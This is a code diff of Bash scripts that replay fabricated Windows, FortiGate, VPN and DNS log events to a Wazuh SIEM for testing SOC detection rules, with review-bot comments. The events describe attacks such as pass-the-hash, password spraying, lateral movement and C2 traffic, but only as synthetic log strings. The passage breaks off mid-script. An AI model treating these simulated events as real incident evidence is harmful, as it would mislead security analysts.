-    "event_type=windows_privilege_group_add event_id=4732 user=\"${SIM_USER}\" action=group_add is_admin=true src_ip=10.10.1.20 dst_host=dc-01"
130
-
131
-  emit_c_usecase "C2-04" "C2" "high" "${WIN_HOST}" \
132
-    "Rapid Privilege Escalation then Sensitive Access" \
133
-    "event_type=windows_file_share_access event_id=5145 user=\"${SIM_USER}\" action=share_access src_ip=10.10.1.20 dst_host=filesrv-02 dst_port=445"
134
-}
135
-
136
-emit_c3() {
137
-  emit_c_usecase "C3-01" "C3" "high" "${WIN_HOST}" \
138
-    "Multiple Authentication Success Across Hosts" \
139
-    "event_type=windows_auth_success event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=app-01 dst_port=3389"
140
-  emit_c_usecase "C3-01" "C3" "high" "${WIN_HOST}" \
141
-    "Multiple Authentication Success Across Hosts" \
142
-    "event_type=windows_auth_success event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=app-02 dst_port=3389"
143
-  emit_c_usecase "C3-01" "C3" "high" "${WIN_HOST}" \
144
-    "Multiple Authentication Success Across Hosts" \
145
-    "event_type=windows_auth_success event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=db-01 dst_port=3389"
146
-  emit_c_usecase "C3-01" "C3" "high" "${WIN_HOST}" \
147
-    "Multiple Authentication Success Across Hosts" \
148
-    "event_type=windows_auth_success event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=db-02 dst_port=3389"
149
-  emit_c_usecase "C3-01" "C3" "high" "${WIN_HOST}" \
150
-    "Multiple Authentication Success Across Hosts" \
151
-    "event_type=windows_auth_success event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=fs-01 dst_port=3389"
152
-
153
-  emit_c_usecase "C3-02" "C3" "high" "${WIN_HOST}" \
154
-    "SMB/RDP Lateral Burst Pattern" \
155
-    "event_type=windows_lateral_movement event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=rdp-01 dst_port=3389"
156
-  emit_c_usecase "C3-02" "C3" "high" "${WIN_HOST}" \
157
-    "SMB/RDP Lateral Burst Pattern" \
158
-    "event_type=windows_lateral_movement event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=smb-01 dst_port=445"
159
-  emit_c_usecase "C3-02" "C3" "high" "${WIN_HOST}" \
160
-    "SMB/RDP Lateral Burst Pattern" \
161
-    "event_type=windows_lateral_movement event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=smb-02 dst_port=445"
162
-  emit_c_usecase "C3-02" "C3" "high" "${WIN_HOST}" \
163
-    "SMB/RDP Lateral Burst Pattern" \
164
-    "event_type=windows_lateral_movement event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=rdp-02 dst_port=3389"
165
-
166
-  emit_c_usecase "C3-03" "C3" "critical" "${WIN_HOST}" \
167
-    "Admin Accessing Many Servers Rapidly" \
168
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=10.20.0.22 dst_host=adm-01 dst_port=3389"
169
-  emit_c_usecase "C3-03" "C3" "critical" "${WIN_HOST}" \
170
-    "Admin Accessing Many Servers Rapidly" \
171
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=10.20.0.22 dst_host=adm-02 dst_port=3389"
172
-  emit_c_usecase "C3-03" "C3" "critical" "${WIN_HOST}" \
173
-    "Admin Accessing Many Servers Rapidly" \
174
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=10.20.0.22 dst_host=adm-03 dst_port=3389"
175
-  emit_c_usecase "C3-03" "C3" "critical" "${WIN_HOST}" \
176
-    "Admin Accessing Many Servers Rapidly" \
177
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=10.20.0.22 dst_host=adm-04 dst_port=3389"
178
-  emit_c_usecase "C3-03" "C3" "critical" "${WIN_HOST}" \
179
-    "Admin Accessing Many Servers Rapidly" \
180
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=10.20.0.22 dst_host=adm-05 dst_port=3389"
181
-
182
-  # C3-04 scanning behavior: many destination ports from same source
183
-  for port in 80 88 135 139 389 443 445 464 636 1025 1433 1521 2049 2375 3306 3389 5432 5985 8080 8443; do
184
-    emit_c_usecase "C3-04" "C3" "medium" "${WIN_HOST}" \
185
-      "Internal Scanning Enumeration Behavior" \
186
-      "event_type=internal_scan src_ip=10.30.0.40 dst_host=10.30.10.$((RANDOM % 10 + 1)) dst_port=${port} action=connect_attempt"
187
-  done
188
-}
189
-
190
-emit_selected_set() {
191
-  local sel
192
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
193
-  case "${sel}" in
194
-    all)
195
-      emit_c1
196
-      emit_c2
197
-      emit_c3
198
-      ;;
199
-    c1|c1-*)
200
-      emit_c1
201
-      ;;
202
-    c2|c2-*)
203
-      emit_c2
204
-      ;;
205
-    c3|c3-*)
206
-      emit_c3
207
-      ;;
208
-    *)
209
-      emit_c1
210
-      emit_c2
211
-      emit_c3
212
-      ;;
213
-  esac
214
-}
215
-
216
-echo "starting proposal Appendix C log simulator"
217
-echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN}"
218
-echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
219
-
220
-if [[ "${FOREVER}" == "true" ]]; then
221
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
222
-  trap 'echo; echo "stopped"; exit 0' INT TERM
223
-  while true; do
224
-    emit_selected_set
225
-    sleep "${DELAY}"
226
-  done
227
-else
228
-  for ((i=1; i<=COUNT; i++)); do
229
-    emit_selected_set
230
-    if [[ "${i}" -lt "${COUNT}" ]]; then
231
-      sleep "${DELAY}"
232
-    fi
233
-  done
234
-  echo "done"
235
-fi
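
Review bot: `emit_c_usecase` hard-codes `source=windows`, so the two C1-01 events, which are sent with `${VPN_HOST}` and `event_type=vpn_login_success`, are tagged as Windows events. If these fixtures move elsewhere, make `source` a parameter as `emit_b_usecase` does in the Appendix B script. The same two events use `src_ip=203.150.10.10` and `src_ip=8.8.8.8`, which are routable addresses, while the other events in this file use the 198.51.100.0/24 and 203.0.113.0/24 documentation ranges. Since the events already carry `country`, `src_lat` and `src_lon`, documentation-range addresses may be enough for the impossible-travel case. Unlike the Appendix B script, this one has no `--profile` option, and its `*)` selector arm has the same silent no-op behaviour on an unknown selector.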

+ 0 - 356
scripts/send-wazuh-proposal-required-events.sh

@@ -1,356 +0,0 @@
1
-#!/usr/bin/env bash
2
-set -euo pipefail
3
-
4
-# Usage:
5
-#   scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds]
6
-#
7
-# selector:
8
-#   all | a1 | a2 | a3 | a4 | <usecase_id>
9
-#   example usecase_id: A2-01, A3-05, A4-24
10
-
11
-SELECTOR="${1:-all}"
12
-COUNT="${2:-1}"
13
-DELAY="${3:-0.3}"
14
-EVENT_DELAY="${EVENT_DELAY:-0.05}"
15
-DRY_RUN="${DRY_RUN:-0}"
16
-FOREVER="false"
17
-PROFILE="${PROFILE:-simulation}"
18
-
19
-for arg in "${@:4}"; do
20
-  case "${arg}" in
21
-    --forever)
22
-      FOREVER="true"
23
-      ;;
24
-    --profile=*)
25
-      PROFILE="${arg#*=}"
26
-      ;;
27
-    *)
28
-      echo "error: unexpected argument '${arg}'"
29
-      echo "usage: scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds] [--forever] [--profile=simulation|production]"
30
-      exit 1
31
-      ;;
32
-  esac
33
-done
34
-
35
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
36
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
37
-
38
-FGT_DEVNAME="${FGT_DEVNAME:-FGT80F-Branch01}"
39
-FGT_DEVID="${FGT_DEVID:-FGT80FTK20000001}"
40
-WIN_HOST="${WIN_HOST:-win-dc01}"
41
-DNS_HOST="${DNS_HOST:-dns-fw-01}"
42
-SIM_VPN_USER="${SIM_VPN_USER:-remote.user}"
43
-
44
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
45
-  echo "error: count must be a positive integer"
46
-  exit 1
47
-fi
48
-
49
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
50
-  echo "error: delay must be numeric"
51
-  exit 1
52
-fi
53
-
54
-if ! [[ "${EVENT_DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
55
-  echo "error: EVENT_DELAY must be numeric"
56
-  exit 1
57
-fi
58
-
59
-if [[ "${PROFILE}" != "simulation" && "${PROFILE}" != "production" ]]; then
60
-  echo "error: profile must be simulation or production"
61
-  exit 1
62
-fi
63
-
64
-rand_public_ip() {
65
-  if [[ $((RANDOM % 2)) -eq 0 ]]; then
66
-    echo "198.51.100.$((RANDOM % 240 + 10))"
67
-  else
68
-    echo "203.0.113.$((RANDOM % 240 + 10))"
69
-  fi
70
-}
71
-
72
-rand_private_ip() {
73
-  echo "10.$((RANDOM % 20 + 10)).$((RANDOM % 200 + 1)).$((RANDOM % 240 + 10))"
74
-}
75
-
76
-rand_domain() {
77
-  echo "ioc-$((RANDOM % 9000 + 1000)).malicious.example"
78
-}
79
-
80
-emit_syslog() {
81
-  local msg="$1"
82
-  local sent="false"
83
-
84
-  if [[ "${DRY_RUN}" == "1" ]]; then
85
-    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
86
-    return 0
87
-  fi
88
-
89
-  if command -v nc >/dev/null 2>&1; then
90
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
91
-      sent="true"
92
-    fi
93
-  fi
94
-
95
-  if [[ "${sent}" != "true" ]]; then
96
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
97
-      sent="true"
98
-    fi
99
-  fi
100
-
101
-  if [[ "${sent}" != "true" ]]; then
102
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
103
-    return 1
104
-  fi
105
-
106
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
107
-}
108
-
109
-selector_matches() {
110
-  local id="$1"
111
-  local section="$2"
112
-  local sel
113
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
114
-  local idl
115
-  idl="$(echo "${id}" | tr '[:upper:]' '[:lower:]')"
116
-  local sec
117
-  sec="$(echo "${section}" | tr '[:upper:]' '[:lower:]')"
118
-
119
-  [[ "${sel}" == "all" || "${sel}" == "${sec}" || "${sel}" == "${idl}" ]]
120
-}
121
-
122
-emit_fgt_usecase() {
123
-  local id="$1"
124
-  local section="$2"
125
-  local severity="$3"
126
-  local usecase="$4"
127
-  local body="$5"
128
-
129
-  selector_matches "${id}" "${section}" || return 0
130
-
131
-  local tags
132
-  if [[ "${PROFILE}" == "production" ]]; then
133
-    tags="soc_mvp_test=true source=fortigate severity=${severity}"
134
-  else
135
-    tags="soc_mvp_test=true source=fortigate section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
136
-  fi
137
-  emit_syslog "<190>date=$(date '+%Y-%m-%d') time=$(date '+%H:%M:%S') devname=\"${FGT_DEVNAME}\" devid=\"${FGT_DEVID}\" eventtime=$(date +%s) vd=\"root\" ${tags} ${body}"
138
-  sleep "${EVENT_DELAY}"
139
-}
140
-
141
-emit_dns_usecase() {
142
-  local id="$1"
143
-  local section="$2"
144
-  local severity="$3"
145
-  local usecase="$4"
146
-  local body="$5"
147
-
148
-  selector_matches "${id}" "${section}" || return 0
149
-
150
-  local tags
151
-  if [[ "${PROFILE}" == "production" ]]; then
152
-    tags="soc_mvp_test=true source=dns severity=${severity}"
153
-  else
154
-    tags="soc_mvp_test=true source=dns section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
155
-  fi
156
-  emit_syslog "<189>$(date '+%b %d %H:%M:%S') ${DNS_HOST} ${tags} ${body}"
157
-  sleep "${EVENT_DELAY}"
158
-}
159
-
160
-emit_windows_usecase() {
161
-  local id="$1"
162
-  local section="$2"
163
-  local severity="$3"
164
-  local usecase="$4"
165
-  local body="$5"
166
-
167
-  selector_matches "${id}" "${section}" || return 0
168
-
169
-  local tags
170
-  if [[ "${PROFILE}" == "production" ]]; then
171
-    tags="soc_mvp_test=true source=windows severity=${severity}"
172
-  else
173
-    tags="soc_mvp_test=true source=windows section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
174
-  fi
175
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} ${tags} ${body}"
176
-  sleep "${EVENT_DELAY}"
177
-}
178
-
179
-emit_a1() {
180
-  local sip
181
-  local domain
182
-  local mip
183
-  sip="$(rand_private_ip)"
184
-  domain="$(rand_domain)"
185
-  mip="$(rand_public_ip)"
186
-
187
-  emit_dns_usecase "A1-01" "A1" "medium" \
188
-    "DNS Network Traffic Communicate to Malicious Domain" \
189
-    "event_type=ioc_dns_traffic src_ip=${sip} query=${domain} resolved_ip=${mip} action=blocked"
190
-
191
-  emit_dns_usecase "A1-02" "A1" "medium" \
192
-    "DNS Network Traffic Malicious Domain IOCs Detection" \
193
-    "event_type=ioc_domain_match src_ip=${sip} ioc_type=domain ioc_value=${domain} feed=threatintel_main confidence=high action=alert"
194
-}
195
-
196
-emit_a2() {
197
-  local pub
198
-  local sip
199
-  pub="$(rand_public_ip)"
200
-  sip="$(rand_private_ip)"
201
-
202
-  emit_fgt_usecase "A2-01" "A2" "high" "IPS IDS Network Traffic Allowed RDP from Public IPs" \
203
-    "logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" srcip=${pub} dstip=${sip} dstport=3389 service=\"RDP\" action=\"accept\" policyid=44"
204
-
205
-  emit_fgt_usecase "A2-02" "A2" "high" "IPS IDS Firewall Account Admin Password Change" \
206
-    "logid=\"0100044547\" type=\"event\" subtype=\"system\" user=\"admin\" action=\"password-change\" target_account=\"admin\""
207
-
208
-  emit_fgt_usecase "A2-03" "A2" "high" "IPS IDS Firewall Account Create Add Admin Account" \
209
-    "logid=\"0100044548\" type=\"event\" subtype=\"system\" user=\"admin\" action=\"create-admin\" target_account=\"secops_admin\""
210
-
211
-  emit_fgt_usecase "A2-04" "A2" "high" "IPS IDS Firewall Configure Disabled Email Notification" \
212
-    "logid=\"0100044551\" type=\"event\" subtype=\"system\" action=\"config-change\" config_item=\"alertemail\" config_value=\"disable\""
213
-
214
-  emit_fgt_usecase "A2-05" "A2" "low" "IPS IDS Firewall Configure Download Configure FW" \
215
-    "logid=\"0100044552\" type=\"event\" subtype=\"system\" action=\"download-config\" user=\"admin\""
216
-
217
-  emit_fgt_usecase "A2-06" "A2" "medium" "IPS IDS IDS Alert Multiple Critical High" \
218
-    "logid=\"0720018432\" type=\"utm\" subtype=\"ips\" action=\"detected\" attack=\"Multiple.Critical.High.Signatures\" severity=\"high\" count=7"
219
-
220
-  emit_fgt_usecase "A2-07" "A2" "low" "IPS IDS Network Traffic Port Scanning" \
221
-    "logid=\"0720018433\" type=\"utm\" subtype=\"anomaly\" attack=\"TCP.Port.Scan\" srcip=${pub} dstip=${sip} action=\"detected\""
222
-
223
-  emit_fgt_usecase "A2-08" "A2" "medium" "IPS IDS Network Traffic IOC Detection" \
224
-    "logid=\"0720018434\" type=\"utm\" subtype=\"ips\" ioc_type=ip ioc_value=$(rand_public_ip) action=\"blocked\""
225
-
226
-  emit_fgt_usecase "A2-09" "A2" "medium" "IPS IDS Network Traffic Port Scanning from Private IP" \
227
-    "logid=\"0720018435\" type=\"utm\" subtype=\"anomaly\" attack=\"Internal.Port.Scan\" srcip=$(rand_private_ip) dstip=$(rand_private_ip) action=\"detected\""
228
-
229
-  emit_fgt_usecase "A2-10" "A2" "medium" "IPS IDS Network Traffic Communicate to Malicious IP" \
230
-    "logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" srcip=$(rand_private_ip) dstip=$(rand_public_ip) threat_label=\"known-c2\" action=\"accept\""
231
-}
232
-
233
-emit_a3() {
234
-  local out_th
235
-  out_th="$(rand_public_ip)"
236
-
237
-  emit_fgt_usecase "A3-01" "A3" "high" "VPN Authentication Success from Guest Account" \
238
-    "logid=\"0101037131\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"guest\" srcip=${out_th} country=\"TH\""
239
-
240
-  emit_fgt_usecase "A3-02" "A3" "high" "VPN Authentication Success from Multiple Country" \
241
-    "logid=\"0101037132\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${out_th} country=\"US\" previous_country=\"TH\""
242
-
243
-  emit_fgt_usecase "A3-03" "A3" "high" "VPN Authentication Brute Force Success" \
244
-    "logid=\"0101037133\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${out_th} failed_attempts_before_success=18"
245
-
246
-  emit_fgt_usecase "A3-04" "A3" "low" "VPN Authentication Multiple Fail Many Accounts from One Source" \
247
-    "logid=\"0101037134\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-fail\" srcip=${out_th} failed_accounts=12"
248
-
249
-  emit_fgt_usecase "A3-05" "A3" "high" "VPN Authentication Success from Outside Thailand" \
250
-    "logid=\"0101037135\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${out_th} country=\"US\" expected_country=\"TH\""
251
-}
252
-
253
-emit_a4() {
254
-  emit_windows_usecase "A4-01" "A4" "medium" "Windows Authentication Multiple Fail from Privileged Account" \
255
-    "event_id=4625 account=\"administrator\" src_ip=$(rand_private_ip) fail_count=9"
256
-  emit_windows_usecase "A4-02" "A4" "medium" "Windows Authentication Multiple Fail from Service Account" \
257
-    "event_id=4625 account=\"svc_backup\" src_ip=$(rand_private_ip) fail_count=11"
258
-  emit_windows_usecase "A4-03" "A4" "medium" "Windows AD Enumeration with Malicious Tools" \
259
-    "event_id=4688 process=\"adfind.exe\" user=\"user1\" host=\"${WIN_HOST}\""
260
-  emit_windows_usecase "A4-04" "A4" "medium" "Windows Authentication Fail from Public IPs" \
261
-    "event_id=4625 account=\"user1\" src_ip=$(rand_public_ip) fail_count=4"
262
-  emit_windows_usecase "A4-05" "A4" "medium" "Windows File Share Enumeration to Single Destination" \
263
-    "event_id=5145 account=\"user1\" src_ip=$(rand_private_ip) share=\"\\\\\\\\fileserver\\\\finance\" object_count=87"
264
-  emit_windows_usecase "A4-06" "A4" "high" "Windows Authentication Success from Public IPs" \
265
-    "event_id=4624 account=\"user2\" src_ip=$(rand_public_ip) logon_type=10"
266
-  emit_windows_usecase "A4-07" "A4" "high" "Windows Authentication Privileged Account Impersonation" \
267
-    "event_id=4624 account=\"administrator\" impersonation=true source_account=\"user2\""
268
-  emit_windows_usecase "A4-08" "A4" "high" "Windows Authentication Successful Pass the Hash RDP" \
269
-    "event_id=4624 account=\"administrator\" logon_type=10 auth_package=\"NTLM\" pth_indicator=true"
270
-  emit_windows_usecase "A4-09" "A4" "high" "Windows Authentication Success from Guest Account" \
271
-    "event_id=4624 account=\"guest\" logon_type=3"
272
-  emit_windows_usecase "A4-10" "A4" "high" "Windows Authentication Interactive Logon Success by Service Account" \
273
-    "event_id=4624 account=\"svc_backup\" logon_type=2"
274
-  emit_windows_usecase "A4-11" "A4" "high" "Windows Account Added to Privileged Custom Group" \
275
-    "event_id=4732 account=\"user3\" target_group=\"SOC-Privileged-Custom\""
276
-  emit_windows_usecase "A4-12" "A4" "high" "Windows Account Added to Privileged Group" \
277
-    "event_id=4728 account=\"user3\" target_group=\"Domain Admins\""
278
-  emit_windows_usecase "A4-13" "A4" "high" "Windows Domain Configure DSRM Password Reset" \
279
-    "event_id=4794 account=\"administrator\" action=\"dsrm-password-reset\""
280
-  emit_windows_usecase "A4-14" "A4" "low" "Windows Authentication Multiple Fail One Account from Many Sources" \
281
-    "event_id=4625 account=\"user4\" src_count=15 fail_count=28"
282
-  emit_windows_usecase "A4-15" "A4" "low" "Windows Authentication Multiple Fail Many Accounts from One Source" \
283
-    "event_id=4625 src_ip=$(rand_private_ip) account_count=18 fail_count=42"
284
-  emit_windows_usecase "A4-16" "A4" "low" "Windows Authentication Multiple Fail from Guest Account" \
285
-    "event_id=4625 account=\"guest\" fail_count=9"
286
-  emit_windows_usecase "A4-17" "A4" "low" "Windows Authentication Multiple Fail One Account from One Source" \
287
-    "event_id=4625 account=\"user5\" src_ip=$(rand_private_ip) fail_count=10"
288
-  emit_windows_usecase "A4-18" "A4" "low" "Windows Authentication Multiple Interactive Logon Denied" \
289
-    "event_id=4625 account=\"user6\" logon_type=2 fail_count=7"
290
-  emit_windows_usecase "A4-19" "A4" "low" "Windows Authentication Password Spray" \
291
-    "event_id=4625 spray=true src_ip=$(rand_public_ip) attempted_accounts=25"
292
-  emit_windows_usecase "A4-20" "A4" "low" "Windows Authentication Attempt from Disabled Account" \
293
-    "event_id=4625 account=\"disabled.user\" status=\"0xC0000072\""
294
-  emit_windows_usecase "A4-21" "A4" "low" "Windows Domain Account Created" \
295
-    "event_id=4720 account=\"new.domain.user\" account_type=\"domain\""
296
-  emit_windows_usecase "A4-22" "A4" "low" "Windows Local Account Re Enabled" \
297
-    "event_id=4722 account=\"local.user\" account_type=\"local\""
298
-  emit_windows_usecase "A4-23" "A4" "low" "Windows Local Account Created" \
299
-    "event_id=4720 account=\"local.new\" account_type=\"local\""
300
-  emit_windows_usecase "A4-24" "A4" "low" "Windows Domain Account Re Enabled" \
301
-    "event_id=4722 account=\"domain.reenabled\" account_type=\"domain\""
302
-}
303
-
304
-emit_selected_set() {
305
-  local sel
306
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
307
-
308
-  case "${sel}" in
309
-    all)
310
-      emit_a1
311
-      emit_a2
312
-      emit_a3
313
-      emit_a4
314
-      ;;
315
-    a1|a1-*)
316
-      emit_a1
317
-      ;;
318
-    a2|a2-*)
319
-      emit_a2
320
-      ;;
321
-    a3|a3-*)
322
-      emit_a3
323
-      ;;
324
-    a4|a4-*)
325
-      emit_a4
326
-      ;;
327
-    *)
328
-      # Exact usecase selectors (e.g. A3-05) are handled by selector_matches.
329
-      emit_a1
330
-      emit_a2
331
-      emit_a3
332
-      emit_a4
333
-      ;;
334
-  esac
335
-}
336
-
337
-echo "starting proposal-required log simulator"
338
-echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN} profile=${PROFILE}"
339
-echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
340
-
341
-if [[ "${FOREVER}" == "true" ]]; then
342
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
343
-  trap 'echo; echo "stopped"; exit 0' INT TERM
344
-  while true; do
345
-    emit_selected_set
346
-    sleep "${DELAY}"
347
-  done
348
-else
349
-  for ((i=1; i<=COUNT; i++)); do
350
-    emit_selected_set
351
-    if [[ "${i}" -lt "${COUNT}" ]]; then
352
-      sleep "${DELAY}"
353
-    fi
354
-  done
355
-  echo "done"
356
-fi
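Review bot: the removed `emit_fgt_usecase`, `emit_dns_usecase` and `emit_windows_usecase` stamped every simulated event with `soc_mvp_test=true`, and the inline guaranteed-hit lines in the replacement `scripts/send-wazuh-sim-logs.sh` carry no such marker, so once they reach the manager there is no field that separates simulator traffic from real alerts. Keep a test marker on the generated lines, or document which field analysts should filter on. Removing `emit_a3` and `emit_a4` also drops the inline A3-01 to A3-05 and A4-01 to A4-24 generators, and the replacement's guaranteed list has no `a3-*` or `a4-*` tag, so coverage of those use cases now depends on tagged entries in `samples/appendix-a-production-samples.log`; please confirm each one is present there.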

+ 550 - 0
scripts/send-wazuh-sim-logs.sh

@@ -0,0 +1,550 @@
1
+#!/usr/bin/env bash
2
+set -euo pipefail
3
+
4
+# Combined Wazuh simulator script (single entrypoint)
5
+# Replays production-style sample logs from samples/*.log to Wazuh syslog UDP.
6
+#
7
+# Usage:
8
+#   scripts/send-wazuh-sim-logs.sh [selector] [count] [delay_seconds] [--forever] [--dry-run] [--no-mock] [--no-guarantee-hits] [--random-types] [--include-nonalerts] [--docker-send]
9
+#
10
+# Selectors:
11
+#   all
12
+#   a|b|c|appendix-a|appendix-b|appendix-c
13
+#   a1|a2|a3|a4|b1|b2|b3|c1|c2|c3
14
+#   A1-01, A2-10, B3-06, C1-01, ...
15
+
16
+SELECTOR="${1:-all}"
17
+COUNT="${2:-1}"
18
+DELAY="${3:-1}"
19
+shift $(( $# >= 3 ? 3 : $# )) || true
20
+
21
+FOREVER=0
22
+DRY_RUN="${DRY_RUN:-0}"
23
+MOCK_VALUES="${MOCK_VALUES:-1}"
24
+GUARANTEE_HITS="${GUARANTEE_HITS:-1}"
25
+RANDOM_TYPES="${RANDOM_TYPES:-0}"
26
+INCLUDE_NONALERTS="${INCLUDE_NONALERTS:-0}"
27
+DOCKER_SEND="${DOCKER_SEND:-0}"
28
+WAZUH_MANAGER_CONTAINER="${WAZUH_MANAGER_CONTAINER:-wazuh-single-wazuh.manager-1}"
29
+
30
+for arg in "$@"; do
31
+  case "$arg" in
32
+    --forever)
33
+      FOREVER=1
34
+      ;;
35
+    --dry-run)
36
+      DRY_RUN=1
37
+      ;;
38
+    --no-mock)
39
+      MOCK_VALUES=0
40
+      ;;
41
+    --mock)
42
+      MOCK_VALUES=1
43
+      ;;
44
+    --no-guarantee-hits)
45
+      GUARANTEE_HITS=0
46
+      ;;
47
+    --guarantee-hits)
48
+      GUARANTEE_HITS=1
49
+      ;;
50
+    --random-types)
51
+      RANDOM_TYPES=1
52
+      ;;
53
+    --include-nonalerts)
54
+      INCLUDE_NONALERTS=1
55
+      ;;
56
+    --docker-send)
57
+      DOCKER_SEND=1
58
+      ;;
59
+    -h|--help)
60
+      echo "usage: scripts/send-wazuh-sim-logs.sh [selector] [count] [delay_seconds] [--forever] [--dry-run] [--no-mock] [--no-guarantee-hits] [--random-types] [--include-nonalerts] [--docker-send]"
61
+      exit 0
62
+      ;;
63
+    *)
64
+      echo "error: unknown option '$arg'"
65
+      exit 1
66
+      ;;
67
+  esac
68
+done
69
+
70
+if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [ "$COUNT" -lt 1 ]; then
71
+  echo "error: count must be a positive integer"
72
+  exit 1
73
+fi
74
+
75
+if ! [[ "$DELAY" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
76
+  echo "error: delay_seconds must be numeric"
77
+  exit 1
78
+fi
79
+
80
+WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
81
+WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
82
+NC_WAIT_SECONDS="${NC_WAIT_SECONDS:-0}"
83
+STRICT_SEND="${STRICT_SEND:-1}"
84
+BASE_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
85
+SAMPLES_DIR="${BASE_DIR}/samples"
86
+
87
+normalize() {
88
+  printf '%s' "$1" | tr '[:upper:]' '[:lower:]'
89
+}
90
+
91
+is_valid_selector() {
92
+  local sel
93
+  sel="$(normalize "$1")"
94
+  case "$sel" in
95
+    all|a|b|c|appendix-a|appendix-b|appendix-c|a1|a2|a3|a4|b1|b2|b3|c1|c2|c3)
96
+      return 0
97
+      ;;
98
+    [abc][0-9]-[0-9][0-9])
99
+      return 0
100
+      ;;
101
+    *)
102
+      return 1
103
+      ;;
104
+  esac
105
+}
106
+
107
+selector_matches_tag() {
108
+  local selector tag sel tagl
109
+  selector="$1"
110
+  tag="$2"
111
+  sel="$(normalize "$selector")"
112
+  tagl="$(normalize "$tag")"
113
+
114
+  if [ -z "$tagl" ]; then
115
+    case "$sel" in
116
+      all|a|b|c|appendix-a|appendix-b|appendix-c)
117
+        return 0
118
+        ;;
119
+      *)
120
+        return 1
121
+        ;;
122
+    esac
123
+  fi
124
+
125
+  case "$sel" in
126
+    all)
127
+      return 0
128
+      ;;
129
+    a|appendix-a)
130
+      [[ "$tagl" == a* ]]
131
+      return
132
+      ;;
133
+    b|appendix-b)
134
+      [[ "$tagl" == b* ]]
135
+      return
136
+      ;;
137
+    c|appendix-c)
138
+      [[ "$tagl" == c* ]]
139
+      return
140
+      ;;
141
+    a1|a2|a3|a4|b1|b2|b3|c1|c2|c3)
142
+      [[ "$tagl" == "$sel"-* ]]
143
+      return
144
+      ;;
145
+    [abc][0-9]-[0-9][0-9])
146
+      [[ "$tagl" == "$sel" ]]
147
+      return
148
+      ;;
149
+    *)
150
+      return 1
151
+      ;;
152
+  esac
153
+}
154
+
155
+sample_files_for_selector() {
156
+  local sel
157
+  sel="$(normalize "$1")"
158
+  case "$sel" in
159
+    all)
160
+      echo "${SAMPLES_DIR}/appendix-a-production-samples.log"
161
+      echo "${SAMPLES_DIR}/appendix-b-production-samples.log"
162
+      echo "${SAMPLES_DIR}/appendix-c-production-samples.log"
163
+      ;;
164
+    a|appendix-a|a1|a2|a3|a4|a[0-9]-[0-9][0-9])
165
+      echo "${SAMPLES_DIR}/appendix-a-production-samples.log"
166
+      ;;
167
+    b|appendix-b|b1|b2|b3|b[0-9]-[0-9][0-9])
168
+      echo "${SAMPLES_DIR}/appendix-b-production-samples.log"
169
